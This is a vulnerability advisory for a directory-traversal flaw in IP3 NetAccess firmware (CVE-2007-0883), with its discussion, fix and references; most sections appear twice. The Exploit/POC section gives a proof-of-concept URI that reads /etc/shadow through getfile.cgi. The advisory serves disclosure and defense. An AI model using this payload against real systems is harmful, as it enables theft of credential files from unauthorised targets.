IP3 NetAccess Directory Traversal Vulnerability
BID:22513
Info
IP3 NetAccess Directory Traversal Vulnerability
| Bugtraq ID: | 22513 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0883 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | Sebastian Wolfgarten is credited with the discovery of this vulnerability. |
| Vulnerable: |
IP3 Networks NA 4.0 |
| Not Vulnerable: |
IP3 Networks NA 4.1.9.6 |
Discussion
IP3 NetAccess Directory Traversal Vulnerability
IP3 NetAccess is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer. An attacker can carry out this attack to obtain any arbitrary file on the affected system.
IP3 NetAccess devices with firmware versions earlier than 4.1.9.6 are vulnerable to this issue.
IP3 NetAccess is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit this vulnerability to reveal the contents of files that contain sensitive information that could aid in further attacks against the affected computer. An attacker can carry out this attack to obtain any arbitrary file on the affected system.
IP3 NetAccess devices with firmware versions earlier than 4.1.9.6 are vulnerable to this issue.
Exploit / POC
IP3 NetAccess Directory Traversal Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
Solution / Fix
IP3 NetAccess Directory Traversal Vulnerability
Solution:
The vendor has released firmware version 4.1.9.6 to address this issue. Please see the
references for more information.
Solution:
The vendor has released firmware version 4.1.9.6 to address this issue. Please see the
references for more information.
References
IP3 NetAccess Directory Traversal Vulnerability
References:
References:
- Arbitrary file disclosure vulnerability in IP3 NetAccess (IP3 Nertworks)
- Vendor Home Page (IP3 Networks)
- Arbitrary file disclosure vulnerability in IP3 NetAccess < 4.1.9.6 (Sebastian Wolfgarten